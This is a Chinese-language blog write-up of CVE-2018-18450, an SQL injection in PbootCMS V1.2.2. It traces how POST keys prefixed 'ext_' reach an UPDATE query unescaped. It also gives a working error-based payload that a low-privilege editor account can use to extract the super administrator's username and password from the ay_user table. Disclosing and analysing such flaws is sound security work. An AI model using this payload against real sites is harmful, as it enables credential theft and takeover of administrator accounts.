Pbootcms最新版存在SQL注入<CVE-2018-18450>

发布于 2018,10,17  1551 次阅读


0x00 cms简介

PbootCMS是翱云科技开发的全新内核永久开源免费PHP网站开发建站管理系统(CMS),系统以高效、简洁、 强悍为开发目标,能够满足各类企业网站建设的需要。

源码下载地址:https://gitee.com/hnaoyun/PbootCMS/releases

版本:PbootCMS V1.2.2-20181012

0x01漏洞分析

漏洞文件:\apps\admin\controller\content\SingleController.php 中的mod方法:

图片1.png

可以看到如果$_POST的键以ext_开头,就直接将键作为$data2的键,并且直接将$data2传入进了modcontentext方法中去:

图片2.png


继续传入到了update方法中去:

图片3.png

可以看到直接将$key拼接进入了$update_string变量造成了注入。


0x02 漏洞利用

这里只需要账户有单页内容的编辑权限即可(一般新闻发布账号就具有的权限)。

图片4.png



然后创建一个账号属于该角色。

图片5.png


登录该低权限账号后发现只能操作单页内容的浏览与修改。

 

然后随便点击一个单页内容进行修改,抓包:


图片7.png



post包末尾添加上payload:&ext_type`%3d1/**/and/**/extractvalue(1,concat(0x7e,(SELECT/**/concat(username,0x23,password)/**/FROM/**/ay_user/**/limit/**/0,1)))%23=1   即可成功注入出超级管理员账号密码。

图片8.png



我的全部野心,就是自由的生活